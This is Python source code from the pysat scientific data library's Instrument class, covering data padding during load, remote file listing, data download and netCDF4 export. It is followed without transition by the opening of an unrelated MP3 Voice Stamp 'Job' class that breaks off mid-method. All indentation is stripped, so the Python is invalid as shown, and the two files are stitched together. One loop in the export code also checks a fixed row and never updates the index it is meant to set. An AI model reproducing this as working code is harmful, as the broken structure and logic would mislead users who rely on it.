tdate = dt.datetime(2009, 1, 1)
if tdate + self.load_step < tdate + loop_pad:
estr = ''.join(('Data padding window must be shorter than ',
'data loading window. Load a greater ',
'range of data or shorten the padding.'))
raise ValueError(estr)
else:
# Loading by file
wstr = ''.join(('Using a data padding window ',
'when loading by file can produce unexpected ',
'results whenever the padding window ',
'is longer than the range of data in a file. ',
'Improving the breadth of the padding window ',
'is planned for the future.'))
logger.warning(wstr)
if (self.pad is not None) or self.multi_file_day:
if self._empty(self._next_data) and self._empty(self._prev_data):
# Data has not already been loaded for previous and next days
# load data for all three
logger.info('Initializing three day/file window')
# Using current date or fid
self._prev_data, self._prev_meta = self._load_prev()
self._curr_data, self._curr_meta = self._load_data(
date=self.date, fid=self._fid, inc=self.load_step,
load_kwargs=kwargs)
self._next_data, self._next_meta = self._load_next()
else:
if self._next_data_track == curr:
# Moving forward in time
del self._prev_data
self._prev_data = self._curr_data
self._prev_meta = self._curr_meta
self._curr_data = self._next_data
self._curr_meta = self._next_meta
self._next_data, self._next_meta = self._load_next()
elif self._prev_data_track == curr:
# Moving backward in time
del self._next_data
self._next_data = self._curr_data
self._next_meta = self._curr_meta
self._curr_data = self._prev_data
self._curr_meta = self._prev_meta
self._prev_data, self._prev_meta = self._load_prev()
else:
# Jumped in time/or switched from filebased to date based
# access
del self._prev_data
del self._curr_data
del self._next_data
self._prev_data, self._prev_meta = self._load_prev()
self._curr_data, self._curr_meta = self._load_data(
date=self.date, fid=self._fid, inc=self.load_step,
load_kwargs=kwargs)
self._next_data, self._next_meta = self._load_next()
# Make sure datetime indices for all data is monotonic
if not self._index(self._prev_data).is_monotonic_increasing:
self._prev_data.sort_index(inplace=True)
if not self._index(self._curr_data).is_monotonic_increasing:
self._curr_data.sort_index(inplace=True)
if not self._index(self._next_data).is_monotonic_increasing:
self._next_data.sort_index(inplace=True)
# Make tracking indexes consistent with new loads
if self._load_by_date:
self._next_data_track = curr + self.load_step
self._prev_data_track = curr - self.load_step
else:
# File and date loads have to be treated differently
# due to change in inclusive/exclusive range end
# treatment. Loading by file is inclusive.
self._next_data_track = curr + self.load_step + 1
self._prev_data_track = curr - self.load_step - 1
# Attach data to object
if not self._empty(self._curr_data):
# The data being added isn't empty, so copy the data values
# and the meta data values
self.data = self._curr_data.copy()
self.meta = self._curr_meta.copy()
else:
# If a new default/empty Meta is added here then it creates
# a bug by potentially overwriting existing, good meta data
# with an empty Meta object. For example, this will happen if
# a multi-day analysis ends on a day with no data.
# Do not re-introduce this issue.
self.data = self._null_data.copy()
# Load by file or by date, as specified
if self._load_by_date:
# Multi-file days can extend past a single day, only want data
# from a specific date if loading by day. Set up times for
# the possible data padding coming up.
first_time = self.date
first_pad = self.date - loop_pad
last_time = self.date + self.load_step
last_pad = self.date + self.load_step + loop_pad
want_last_pad = False
elif (not self._load_by_date) and (not self.multi_file_day):
# Loading by file, can't be a multi_file-day flag situation
first_time = self._index(self._curr_data)[0]
first_pad = first_time - loop_pad
last_time = self._index(self._curr_data)[-1]
last_pad = last_time + loop_pad
want_last_pad = True
else:
raise ValueError(" ".join(("Can't have multi_file_day and load",
"by file.")))
# Pad data based upon passed parameter
if (not self._empty(self._prev_data)) & (not self.empty):
stored_data = self.data # .copy()
temp_time = copy.deepcopy(self.index[0])
# Pad data using access mechanisms that works for both pandas
# and xarray
self.data = self._prev_data.copy()
# __getitem__ used below to get data from instrument object.
# Details for handling pandas and xarray are different and
# handled by __getitem__
self.data = self[first_pad:temp_time]
if not self.empty:
if self.index[-1] == temp_time:
self.data = self[:-1]
self.concat_data(stored_data, prepend=False)
else:
self.data = stored_data
if (not self._empty(self._next_data)) & (not self.empty):
stored_data = self.data # .copy()
temp_time = copy.deepcopy(self.index[-1])
# Pad data using access mechanisms that work foro both pandas
# and xarray
self.data = self._next_data.copy()
self.data = self[temp_time:last_pad]
if not self.empty:
if (self.index[0] == temp_time):
self.data = self[1:]
self.concat_data(stored_data, prepend=True)
else:
self.data = stored_data
self.data = self[first_pad:last_pad]
# Want exclusive end slicing behavior from above
if not self.empty:
if (self.index[-1] == last_pad) & (not want_last_pad):
self.data = self[:-1]
# If self.pad is False, load single day
else:
self.data, meta = self._load_data(date=self.date, fid=self._fid,
inc=self.load_step,
load_kwargs=kwargs)
if not self.empty:
self.meta = meta
# If only some metadata included, define the remaining variables
warn_default = False
for var in self.variables:
if var not in self.meta:
default_warn = "".join(["Metadata set to defaults, as",
" they were missing in the ",
"Instrument"])
warn_default = True
self.meta[var] = {self.meta.labels.name: var,
self.meta.labels.notes: default_warn}
if warn_default:
warnings.warn(default_warn, stacklevel=2)
# Check if load routine actually returns meta
if self.meta.data.empty:
self.meta[self.variables] = {self.meta.labels.name: self.variables}
# If loading by file set the yr, doy, and date
if not self._load_by_date:
if self.pad is not None:
temp = first_time
else:
temp = self.index[0]
self.date = dt.datetime(temp.year, temp.month, temp.day)
self.yr, self.doy = utils.time.getyrdoy(self.date)
# Ensure data is unique and monotonic. Check occurs after all the data
# padding loads, or individual load. Thus, it can potentially check
# issues with padding or with raw data
if not (self.index.is_monotonic_increasing and self.index.is_unique):
message = ''
if not self.index.is_unique:
message = ' '.join((message, 'Loaded data is not unique.'))
if not self.index.is_monotonic_increasing:
message = ' '.join((message, 'Loaded data is not',
'monotonically increasing. '))
if self.strict_time_flag:
raise ValueError(' '.join((message, 'To continue to use data,'
'set inst.strict_time_flag=False',
'before loading data')))
else:
warnings.warn(message, stacklevel=2)
# Apply the instrument preprocess routine, if data present
if not self.empty:
# Does not require self as input, as it is a partial func
self._preprocess_rtn(**self.kwargs['preprocess'])
# Clean data, if data is present and cleaning requested
if (not self.empty) & (self.clean_level != 'none'):
self._clean_rtn(**self.kwargs['clean'])
# Apply custom functions via the nanokernel in self.custom
if not self.empty:
self.custom_apply_all()
# Remove the excess data padding, if any applied
if (self.pad is not None) & (not self.empty) & (not verifyPad):
self.data = self[first_time: last_time]
if not self.empty:
if (self.index[-1] == last_time) & (not want_last_pad):
self.data = self[:-1]
# Transfer any extra attributes in meta to the Instrument object
self.meta.transfer_attributes_to_instrument(self)
self.meta.mutable = False
sys.stdout.flush()
return
def remote_file_list(self, start=None, stop=None, **kwargs):
"""List remote files for chosen instrument
Parameters
----------
start : dt.datetime or NoneType
Starting time for file list. A None value will start with the first
file found.
(default=None)
stop : dt.datetime or NoneType
Ending time for the file list. A None value will stop with the last
file found.
(default=None)
**kwargs : dict
Dictionary of keywords that may be options for specific instruments.
The keyword arguments 'user' and 'password' are expected for remote
databases requiring sign in or registration.
Returns
-------
Series
pandas Series of filenames indexed by date and time
Note
----
Default behaviour is to return all files. User may additionally
specify a given year, year/month, or year/month/day combination to
return a subset of available files.
"""
# Add the function kwargs
kwargs["start"] = start
kwargs["stop"] = stop
# Add the user-supplied kwargs
rtn_key = 'list_remote_files'
if rtn_key in self.kwargs.keys():
for user_key in self.kwargs[rtn_key].keys():
# Don't overwrite kwargs supplied directly to this routine
if user_key not in kwargs.keys():
kwargs[user_key] = self.kwargs[rtn_key][user_key]
# Return the function call
return self._list_remote_files_rtn(self.tag, self.inst_id, **kwargs)
def remote_date_range(self, start=None, stop=None, **kwargs):
"""Returns fist and last date for remote data
Parameters
----------
start : dt.datetime or NoneType
Starting time for file list. A None value will start with the first
file found.
(default=None)
stop : dt.datetime or NoneType
Ending time for the file list. A None value will stop with the last
file found.
(default=None)
**kwargs : dict
Dictionary of keywords that may be options for specific instruments.
The keyword arguments 'user' and 'password' are expected for remote
databases requiring sign in or registration.
Returns
-------
List
First and last datetimes obtained from remote_file_list
Note
----
Default behaviour is to search all files. User may additionally
specify a given year, year/month, or year/month/day combination to
return a subset of available files.
"""
files = self.remote_file_list(start=start, stop=stop, **kwargs)
return [files.index[0], files.index[-1]]
def download_updated_files(self, **kwargs):
"""Grabs a list of remote files, compares to local, then downloads new
files.
Parameters
----------
**kwargs : dict
Dictionary of keywords that may be options for specific instruments
Note
----
Data will be downloaded to pysat_data_dir/patform/name/tag
If Instrument bounds are set to defaults they are updated
after files are downloaded.
"""
# get list of remote files
remote_files = self.remote_file_list()
if remote_files.empty:
logger.warning(' '.join(('No remote files found. Unable to',
'download latest data.')))
return
# Get current list of local files
self.files.refresh()
local_files = self.files.files
# Compare local and remote files. First look for dates that are in
# remote but not in local
new_dates = []
for date in remote_files.index:
if date not in local_files:
new_dates.append(date)
# Now compare filenames between common dates as it may be a new version
# or revision. This will have a problem with filenames that are
# faking daily data from monthly.
for date in local_files.index:
if date in remote_files.index:
if remote_files[date] != local_files[date]:
new_dates.append(date)
logger.info(' '.join(('Found {} files that'.format(len(new_dates)),
'are new or updated.')))
# Download date for dates in new_dates (also includes new names)
self.download(date_array=new_dates, **kwargs)
def download(self, start=None, stop=None, freq='D', date_array=None,
**kwargs):
"""Download data for given Instrument object from start to stop.
Parameters
----------
start : pandas.datetime (yesterday)
start date to download data
stop : pandas.datetime (tomorrow)
stop date (inclusive) to download data
freq : string
Stepsize between dates for season, 'D' for daily, 'M' monthly
(see pandas)
date_array : list-like
Sequence of dates to download date for. Takes precedence over
start and stop inputs
**kwargs : dict
Dictionary of keywords that may be options for specific instruments.
The keyword arguments 'user' and 'password' are expected for remote
databases requiring sign in or registration.
Note
----
Data will be downloaded to pysat_data_dir/patform/name/tag
If Instrument bounds are set to defaults they are updated
after files are downloaded.
"""
# Make sure directories are there, otherwise create them
try:
os.makedirs(self.files.data_path)
except OSError as err:
if err.errno != errno.EEXIST:
# Ok if directories already exist, otherwise exit with an
# error that includes the message from original error.
msg = ''.join(('There was a problem creating the path: ',
self.files.data_path,
', to store downloaded data for ', self.platform,
self.name, '. ', err.message))
raise ValueError(msg)
if start is None and stop is None and date_array is None:
# Defaults for downloads are set here rather than in the method
# signature since method defaults are only set once! If an
# Instrument object persists longer than a day then the download
# defaults would no longer be correct. Dates are always correct in
# this setup.
logger.info(''.join(['Downloading the most recent data by ',
'default (yesterday through tomorrow).']))
start = self.yesterday()
stop = self.tomorrow()
elif stop is None and date_array is None:
stop = start + dt.timedelta(days=1)
logger.info('Downloading data to: {}'.format(self.files.data_path))
if date_array is None:
# Create range of dates for downloading data. Make sure dates are
# whole days
start = utils.time.filter_datetime_input(start)
stop = utils.time.filter_datetime_input(stop)
date_array = utils.time.create_date_range(start, stop, freq=freq)
# Add necessary kwargs to the optional kwargs
kwargs['tag'] = self.tag
kwargs['inst_id'] = self.inst_id
kwargs['data_path'] = self.files.data_path
for kwarg in self.kwargs['download']:
if kwarg not in kwargs:
kwargs[kwarg] = self.kwargs['download'][kwarg]
# Download the data, if enough data is requested
if len(date_array) > 0:
self._download_rtn(date_array, **kwargs)
# Get the current file date range
first_date = self.files.start_date
last_date = self.files.stop_date
logger.info('Updating pysat file list')
self.files.refresh()
# If instrument object has default bounds, update them
if len(self.bounds[0]) == 1:
# Get current bounds
curr_bound = self.bounds
if self._iter_type == 'date':
if(curr_bound[0][0] == first_date
and curr_bound[1][0] == last_date):
logger.info('Updating instrument object bounds by date')
self.bounds = (self.files.start_date,
self.files.stop_date, curr_bound[2],
curr_bound[3])
if self._iter_type == 'file':
# Account for the fact the file datetimes may not land
# exactly at start or end of a day.
dsel1 = slice(first_date, first_date
+ dt.timedelta(hours=23, minutes=59,
seconds=59))
dsel2 = slice(last_date, last_date
+ dt.timedelta(hours=23, minutes=59,
seconds=59))
if(curr_bound[0][0] == self.files[dsel1][0]
and curr_bound[1][0] == self.files[dsel2][-1]):
logger.info('Updating instrument object bounds by file')
dsel1 = slice(self.files.start_date,
self.files.start_date
+ dt.timedelta(hours=23, minutes=59,
seconds=59))
dsel2 = slice(self.files.stop_date, self.files.stop_date
+ dt.timedelta(hours=23, minutes=59,
seconds=59))
self.bounds = (self.files[dsel1][0],
self.files[dsel2][-1],
curr_bound[2], curr_bound[3])
else:
logger.warning(''.join(['Requested download over an empty date ',
'range: {:} to {:}'.format(start, stop)]))
return
def to_netcdf4(self, fname=None, base_instrument=None, epoch_name='Epoch',
zlib=False, complevel=4, shuffle=True,
preserve_meta_case=False, export_nan=None,
unlimited_time=True):
"""Stores loaded data into a netCDF4 file.
Parameters
----------
fname : str
full path to save instrument object to
base_instrument : pysat.Instrument
used as a comparison, only attributes that are present with
self and not on base_instrument are written to netCDF
epoch_name : str
Label in file for datetime index of Instrument object
zlib : bool
Flag for engaging zlib compression (True - compression on)
complevel : int
an integer between 1 and 9 describing the level of compression
desired. Ignored if zlib=False. (default=4)
shuffle : bool
The HDF5 shuffle filter will be applied before compressing the data.
This significantly improves compression. Ignored if zlib=False.
(default=True)
preserve_meta_case : bool
if True, then the variable strings within the MetaData object, which
preserves case, are used to name variables in the written netCDF
file.
If False, then the variable strings used to access data from the
Instrument object are used instead. By default, the variable strings
on both the data and metadata side are the same, though this
relationship may be altered by a user. (default=False)
export_nan : list or None
By default, the metadata variables where a value of NaN is allowed
and written to the netCDF4 file is maintained by the Meta object
attached to the pysat.Instrument object. A list supplied here
will override the settings provided by Meta, and all parameters
included will be written to the file. If not listed
and a value is NaN then that attribute simply won't be included in
the netCDF4 file. (default=None)
unlimited_time : bool
If True, then the main epoch dimension will be set to 'unlimited'
within the netCDF4 file. (default=True)
Note
----
Stores 1-D data along dimension 'epoch' - the date time index.
Stores higher order data (e.g. dataframes within series) separately
- The name of the main variable column is used to prepend subvariable
names within netCDF, var_subvar_sub
- A netCDF4 dimension is created for each main variable column
with higher order data; first dimension Epoch
- The index organizing the data stored as a dimension variable
- from_netcdf4 uses the variable dimensions to reconstruct data
structure
All attributes attached to instrument meta are written to netCDF attrs
with the exception of 'Date_End', 'Date_Start', 'File', 'File_Date',
'Generation_Date', and 'Logical_File_ID'. These are defined within
to_netCDF at the time the file is written, as per the adopted standard,
SPDF ISTP/IACG Modified for NetCDF. Atrributes 'Conventions' and
'Text_Supplement' are given default values if not present.
"""
# Check export nans first
if export_nan is None:
export_nan = self.meta._export_nan
# Base_instrument used to define the standard attributes attached
# to the instrument object. Any additional attributes added
# to the main input Instrument will be written to the netCDF4
base_instrument = Instrument() if base_instrument is None \
else base_instrument
# Begin processing metadata for writing to the file. Look to see if
# user supplied a list of export keys corresponding to internally
# tracked metadata within pysat
export_meta = self.generic_meta_translator(self.meta)
if self._meta_translation_table is None:
# Didn't find a translation table, using the strings
# attached to the supplied pysat.Instrument object
export_name_labels = [self.meta.labels.name]
export_units_labels = [self.meta.labels.units]
export_desc_labels = [self.meta.labels.desc]
export_notes_labels = [self.meta.labels.notes]
else:
# User supplied labels in translation table
export_name_labels = self._meta_translation_table['name']
export_units_labels = self._meta_translation_table['units']
export_desc_labels = self._meta_translation_table['desc']
export_notes_labels = self._meta_translation_table['notes']
logger.info(' '.join(('Using Metadata Translation Table:',
str(self._meta_translation_table))))
# Apply instrument specific post-processing to the export_meta
if hasattr(self._export_meta_post_processing, '__call__'):
export_meta = self._export_meta_post_processing(export_meta)
# Check if there are multiple variables with same characters
# but with different case
lower_variables = [var.lower() for var in self.variables]
unique_lower_variables = np.unique(lower_variables)
if len(unique_lower_variables) != len(lower_variables):
raise ValueError(' '.join(('There are multiple variables with the',
'same name but different case which',
'results in a loss of metadata. Please',
'make the names unique.')))
# General process for writing data:
# 1) take care of the EPOCH information,
# 2) iterate over the variable colums in Instrument.data and check
# the type of data,
# - if 1D column:
# A) do simple write (type is not an object)
# B) if it is an object, then check if writing strings
# C) if not strings, write object
# - if column is a Series of Frames, write as 2D variables
# 3) metadata must be filtered before writing to netCDF4, since
# string variables can't have a fill value
with netCDF4.Dataset(fname, mode='w', format='NETCDF4') as out_data:
# number of items, yeah
num = len(self.index)
# write out the datetime index
if unlimited_time:
out_data.createDimension(epoch_name, None)
else:
out_data.createDimension(epoch_name, num)
cdfkey = out_data.createVariable(epoch_name, 'i8',
dimensions=(epoch_name),
zlib=zlib,
complevel=complevel,
shuffle=shuffle)
# grab existing metadata for Epoch or create suitable info
if epoch_name in self.meta:
new_dict = export_meta[self.meta.var_case_name(epoch_name)]
else:
# create empty shell
new_dict = {}
# update required and basic information if not present
for export_name_label in export_name_labels:
if export_name_label not in new_dict:
new_dict[export_name_label] = epoch_name
for export_units_label in export_units_labels:
if export_units_label not in new_dict:
new_dict[export_units_label] = \
'Milliseconds since 1970-1-1 00:00:00'
for export_desc_label in export_desc_labels:
if export_desc_label not in new_dict:
new_dict[export_desc_label] = \
'Milliseconds since 1970-1-1 00:00:00'
for export_notes_label in export_notes_labels:
if export_notes_label not in new_dict:
new_dict[export_notes_label] = ''
new_dict['calendar'] = 'standard'
new_dict['Format'] = 'i8'
new_dict['Var_Type'] = 'data'
if self.index.is_monotonic_increasing:
new_dict['MonoTon'] = 'increase'
elif self.index.is_monotonic_decreasing:
new_dict['MonoTon'] = 'decrease'
new_dict['Time_Base'] = 'Milliseconds since 1970-1-1 00:00:00'
new_dict['Time_Scale'] = 'UTC'
new_dict = self._filter_netcdf4_metadata(new_dict, np.int64,
export_nan=export_nan)
# attach metadata
cdfkey.setncatts(new_dict)
# Attach the time index to the data
cdfkey[:] = (self.index.values.astype(np.int64)
* 1.E-6).astype(np.int64)
# iterate over all of the columns in the Instrument dataframe
# check what kind of data we are dealing with, then store
for key in self.variables:
# get information on type data we are dealing with
# data is data in proer type( multiformat support)
# coltype is the direct type, np.int64
# and datetime_flag lets you know if the data is full of time
# information
if preserve_meta_case:
# use the variable case stored in the MetaData object
case_key = self.meta.var_case_name(key)
else:
# use variable names used by user when working with data
case_key = key
data, coltype, datetime_flag = self._get_data_info(self[key])
# operate on data based upon type
if self[key].dtype != np.dtype('O'):
# not an object, normal basic 1D data
cdfkey = out_data.createVariable(case_key,
coltype,
dimensions=(epoch_name),
zlib=zlib,
complevel=complevel,
shuffle=shuffle)
# attach any meta data, after filtering for standards
try:
# attach dimension metadata
new_dict = export_meta[case_key]
new_dict['Depend_0'] = epoch_name
new_dict['Display_Type'] = 'Time Series'
new_dict['Format'] = self._get_var_type_code(coltype)
new_dict['Var_Type'] = 'data'
new_dict = self._filter_netcdf4_metadata(
new_dict, coltype, export_nan=export_nan)
cdfkey.setncatts(new_dict)
except KeyError as err:
logger.info(' '.join((str(err), '\n',
' '.join(('Unable to find'
'MetaData for',
key)))))
# assign data
if datetime_flag:
# datetime is in nanoseconds, storing milliseconds
cdfkey[:] = (data.values.astype(coltype)
* 1.0E-6).astype(coltype)
else:
# not datetime data, just store as is
cdfkey[:] = data.values.astype(coltype)
# back to main check on type of data to write
else:
# It is a Series of objects. First, figure out what the
# individual object typess are. Then, act as needed.
# Use info in coltype to get real datatype of object
if (coltype == str):
cdfkey = out_data.createVariable(case_key,
coltype,
dimensions=epoch_name,
zlib=zlib,
complevel=complevel,
shuffle=shuffle)
# Attach any meta data
try:
# Attach dimension metadata
new_dict = export_meta[case_key]
new_dict['Depend_0'] = epoch_name
new_dict['Display_Type'] = 'Time Series'
new_dict['Format'] = self._get_var_type_code(
coltype)
new_dict['Var_Type'] = 'data'
# No FillValue or FillVal allowed for strings
new_dict = self._filter_netcdf4_metadata(
new_dict, coltype, remove=True,
export_nan=export_nan)
# Really attach metadata now
cdfkey.setncatts(new_dict)
except KeyError:
logger.info(' '.join(('Unable to find MetaData for',
key)))
# Time to actually write the data now
cdfkey[:] = data.values
# Still dealing with an object, not just a Series of
# strings. Maps to `if` check on coltypes, being
# string-based.
else:
# Presuming a series with a dataframe or series in each
# location start by collecting some basic info on
# dimensions sizes, names, then create corresponding
# netCDF4 dimensions total dimensions stored for object
# are epoch plus ones created below
dims = np.shape(self[key].iloc[0])
obj_dim_names = []
if len(dims) == 1:
# generally working with higher dimensional data
# pad dimensions so that the rest of the code works
# for either a Series or a Frame
dims = (dims[0], 0)
for i, dim in enumerate(dims[:-1]):
# don't need to go over last dimension value,
# it covers number of columns (if a frame)
obj_dim_names.append(case_key)
out_data.createDimension(obj_dim_names[-1], dim)
# create simple tuple with information needed to create
# the right dimensions for variables that will
# be written to file
var_dim = tuple([epoch_name] + obj_dim_names)
# We need to do different things if a series or
# dataframe stored
try:
# start by assuming it is a dataframe
# get list of subvariables
iterable = self[key].iloc[0].columns
# store our newfound knowledge, we are dealing with
# a series of DataFrames
is_frame = True
except AttributeError:
# turns out data is Series of Series
# which doesn't have columns
iterable = [self[key].iloc[0].name]
is_frame = False
# find location within main variable that actually
# has subvariable data (not just empty frame/series)
# so we can determine what the real underlying data
# types are
good_data_loc = 0
for jjj in np.arange(len(self.data)):
if len(self.data[key].iloc[0]) > 0:
data_loc = jjj
break
# found a place with data, if there is one
# now iterate over the subvariables, get data info
# create netCDF4 variables and store the data
# stored name is variable_subvariable
for col in iterable:
if is_frame:
# we are working with a dataframe so
# multiple subvariables stored under a single
# main variable heading
idx = self[key].iloc[good_data_loc][col]
data, coltype, _ = self._get_data_info(idx)
cdfkey = out_data.createVariable(
'_'.join((case_key, col)), coltype,
dimensions=var_dim, zlib=zlib,
complevel=complevel, shuffle=shuffle)
# attach any meta data
try:
new_dict = export_meta['_'.join((case_key,
col))]
new_dict['Depend_0'] = epoch_name
new_dict['Depend_1'] = obj_dim_names[-1]
new_dict['Display_Type'] = 'Spectrogram'
new_dict['Format'] = \
self._get_var_type_code(coltype)
new_dict['Var_Type'] = 'data'
new_dict = self._filter_netcdf4_metadata(
new_dict, coltype,
export_nan=export_nan)
cdfkey.setncatts(new_dict)
except KeyError as err:
logger.info(' '.join((str(err), '\n',
'Unable to find',
'MetaData for',
', '.join((key,
col)))))
# Attach data. It may be slow to repeatedly
# call the store method as well astype method
# below collect data into a numpy array, then
# write the full array in one go
temp_cdf_data = np.zeros(
(num, dims[0])).astype(coltype)
for i in range(num):
temp_cdf_data[i, :] = \
self[key].iloc[i][col].values
# Write data
cdfkey[:, :] = temp_cdf_data.astype(coltype)
else:
# We are dealing with a Series. Get
# information from within the series
idx = self[key].iloc[good_data_loc]
data, coltype, _ = self._get_data_info(idx)
cdfkey = out_data.createVariable(
case_key + '_data', coltype,
dimensions=var_dim, zlib=zlib,
complevel=complevel, shuffle=shuffle)
# Attach any meta data
try:
new_dict = export_meta[case_key]
new_dict['Depend_0'] = epoch_name
new_dict['Depend_1'] = obj_dim_names[-1]
new_dict['Display_Type'] = 'Spectrogram'
new_dict['Format'] = \
self._get_var_type_code(coltype)
new_dict['Var_Type'] = 'data'
new_dict = self._filter_netcdf4_metadata(
new_dict, coltype,
export_nan=export_nan)
# Really attach metadata now
cdfkey.setncatts(new_dict)
except KeyError as err:
logger.info(' '.join((str(err), '\n',
'Unable to find ',
'MetaData for,',
key)))
# attach data
temp_cdf_data = np.zeros(
(num, dims[0])).astype(coltype)
for i in range(num):
temp_cdf_data[i, :] = self[i, key].values
# write data
cdfkey[:, :] = temp_cdf_data.astype(coltype)
# We are done storing the actual data for the given
# higher order variable. Now we need to store the index
# for all of that fancy data.
# Get index information
idx = good_data_loc
data, coltype, datetime_flag = self._get_data_info(
self[key].iloc[idx].index)
# Create dimension variable for to store index in
# netCDF4
cdfkey = out_data.createVariable(case_key, coltype,
dimensions=var_dim,
zlib=zlib,
complevel=complevel,
shuffle=shuffle)
# Work with metadata
new_dict = export_meta[case_key]
new_dict['Depend_0'] = epoch_name
new_dict['Depend_1'] = obj_dim_names[-1]
new_dict['Display_Type'] = 'Time Series'
new_dict['Format'] = self._get_var_type_code(coltype)
new_dict['Var_Type'] = 'data'
if datetime_flag:
for export_name_label in export_name_labels:
new_dict[export_name_label] = epoch_name
for export_units_label in export_units_labels:
new_dict[export_units_label] = \
'Milliseconds since 1970-1-1 00:00:00'
new_dict = self._filter_netcdf4_metadata(
new_dict, coltype, export_nan=export_nan)
# Set metadata dict
cdfkey.setncatts(new_dict)
# Set data
temp_cdf_data = np.zeros((num,
dims[0])).astype(coltype)
for i in range(num):
temp_cdf_data[i, :] = self[i, key].index.values
cdfkey[:, :] = (temp_cdf_data.astype(coltype)
* 1.E-6).astype(coltype)
else:
if self[key].iloc[data_loc].index.name is not None:
for export_name_label in export_name_labels:
new_dict[export_name_label] = \
self[key].iloc[data_loc].index.name
else:
for export_name_label in export_name_labels:
new_dict[export_name_label] = key
new_dict = self._filter_netcdf4_metadata(
new_dict, coltype, export_nan=export_nan)
# Assign metadata dict
cdfkey.setncatts(new_dict)
# Set data
temp_cdf_data = np.zeros(
(num, dims[0])).astype(coltype)
for i in range(num):
temp_cdf_data[i, :] = \
self[key].iloc[i].index.astype(str)
cdfkey[:, :] = temp_cdf_data.astype(coltype)
# Store any non standard attributes. Compare this Instrument's
# attributes to base object
base_attrb = dir(base_instrument)
this_attrb = dir(self)
# Filter out any 'private' attributes (those that start with a '_')
adict = {}
for key in this_attrb:
if key not in base_attrb:
if key[0] != '_':
adict[key] = self.__getattribute__(key)
# Add additional metadata to conform to standards
adict['pysat_version'] = pysat.__version__
if 'Conventions' not in adict:
adict['Conventions'] = 'SPDF ISTP/IACG Modified for NetCDF'
if 'Text_Supplement' not in adict:
adict['Text_Supplement'] = ''
# Remove any attributes with the names below.
# pysat is responible for including them in the file.
items = ['Date_End', 'Date_Start', 'File', 'File_Date',
'Generation_Date', 'Logical_File_ID']
for item in items:
if item in adict:
_ = adict.pop(item)
adict['Date_End'] = dt.datetime.strftime(
self.index[-1], '%a, %d %b %Y, %Y-%m-%dT%H:%M:%S.%f')
adict['Date_End'] = adict['Date_End'][:-3] + ' UTC'
adict['Date_Start'] = dt.datetime.strftime(
self.index[0], '%a, %d %b %Y, %Y-%m-%dT%H:%M:%S.%f')
adict['Date_Start'] = adict['Date_Start'][:-3] + ' UTC'
adict['File'] = os.path.split(fname)
adict['File_Date'] = self.index[-1].strftime(
'%a, %d %b %Y, %Y-%m-%dT%H:%M:%S.%f')
adict['File_Date'] = adict['File_Date'][:-3] + ' UTC'
adict['Generation_Date'] = dt.datetime.utcnow().strftime('%Y%m%d')
adict['Logical_File_ID'] = os.path.split(fname)[-1].split('.')[:-1]
# check for binary types, convert when found
for key in adict.keys():
if adict[key] is None:
adict[key] = ''
elif isinstance(adict[key], bool):
adict[key] = int(adict[key])
# attach attributes
out_data.setncatts(adict)
return
#
# ----------------------------------------------
# Utilities supporting the Instrument Object
# ----------------------------------------------
#
def _kwargs_keys_to_func_name(kwargs_key):
""" Convert from self.kwargs key name to the function/method name
Parameters
----------
kwargs_key : str
Key from self.kwargs dictionary
Returns
-------
func_name : str
Name of method or function associated with the input key
"""
func_name = '_{:s}_rtn'.format(kwargs_key)
return func_name
# Hidden variable to store pysat reserved keywords. Defined here
# since these values are used by both the Instrument class and
# a function defined below.
_reserved_keywords = ['fnames', 'inst_id', 'tag', 'date_array',
'data_path', 'format_str', 'supported_tags',
'start', 'stop', 'freq']
def _get_supported_keywords(local_func):
"""Return a dict of supported keywords
Parameters
----------
local_func : Python method or functools.partial
Method used to load data within pysat
Returns
-------
out_dict : dict
dict of supported keywords and default values
Note
----
If the input is a partial function then the list of keywords returned only
includes keywords that have not already been set as part of the
functools.partial instantiation.
"""
global _reserved_keywords
# Account for keywords that are treated by Instrument as args
pre_kws = _reserved_keywords.copy()
# Check if this is a partial function
if isinstance(local_func, functools.partial):
# get keyword arguments already applied to function
existing_kws = local_func.keywords
# pull out python function portion
local_func = local_func.func
else:
existing_kws = {}
# account for keywords already set since input was a partial function
pre_kws.extend(existing_kws.keys())
# Get the lists of arguments and defaults
# The args and kwargs are both in the args list, and args are placed first
#
# modified from code on
# https://stackoverflow.com/questions/196960/
# can-you-list-the-keyword-arguments-a-function-receives
sig = inspect.getfullargspec(local_func)
func_args = list(sig.args)
# Recast the function defaults as a list instead of NoneType or tuple.
# inspect returns func_defaults=None when there are no defaults
if sig.defaults is None:
func_defaults = []
else:
func_defaults = [dval for dval in sig.defaults]
# Remove arguments from the start of the func_args list
while len(func_args) > len(func_defaults):
func_args.pop(0)
# Remove pre-existing keywords from output. Start by identifying locations
pop_list = [i for i, arg in enumerate(func_args) if arg in pre_kws]
# Remove pre-selected by cycling backwards through the list of indices
for i in pop_list[::-1]:
func_args.pop(i)
func_defaults.pop(i)
# Create the output dict
out_dict = {akey: func_defaults[i] for i, akey in enumerate(func_args)}
return out_dict
def _pass_func(*args, **kwargs):
""" Default function for updateable Instrument methods
"""
pass
def _check_load_arguments_none(args, raise_error=False):
"""Ensure all arguments are None.
Used to support .load method checks that arguments that should be
None are None, while also keeping the .load method readable.
Parameters
----------
args : iterable object
Variables that are to checked to ensure None
raise_error : bool
If True, an error is raised if all args aren't None (default=False)
Raises
------
ValueError
If all args aren't None and raise_error is True
Raises
-------
bool
True, if all args are None
"""
all_none = True
for arg in args:
if arg is not None:
all_none = False
if raise_error:
estr = ''.join(('An inconsistent set of inputs have been ',
'supplied as input. Please double-check that ',
'only date, filename, or year/day of year ',
'combinations are provided.'))
raise ValueError(estr)
return all_none
|
# coding=utf8
"""
MP3 Voice Stamp
Athletes' companion: adds synthetized voice overlay with various
info and on-going timer to your audio files
Copyright ©2018 <NAME> <mail [@] <EMAIL>>
https://github.com/MarcinOrlowski/Mp3VoiceStamp
"""
from __future__ import print_function
import os
import shutil
import tempfile
from mp3voicestamp_app.audio import Audio
from mp3voicestamp_app.mp3_file_info import Mp3FileInfo
from mp3voicestamp_app.util import Util
from mp3voicestamp_app.tools import Tools
from mp3voicestamp_app.log import Log
class Job(object):
def __init__(self, config, tools):
self.__config = config
self.__tmp_dir = None
self.__tmp_mp3_file = None
self.__tools = tools
self.__audio = Audio(tools)
def get_out_file_name(self, music_track):
"""Build out file name based on provided template and music_track data
"""
out_base_name, out_base_ext = Util.split_file_name(music_track.file_name)
formatted_file_name = self.__config.file_out_format.format(name=out_base_name, ext=out_base_ext)
out_file_name = os.path.basename(music_track.file_name)
if self.__config.file_out is None:
out_file_name = os.path.join(os.path.dirname(music_track.file_name), formatted_file_name)
else:
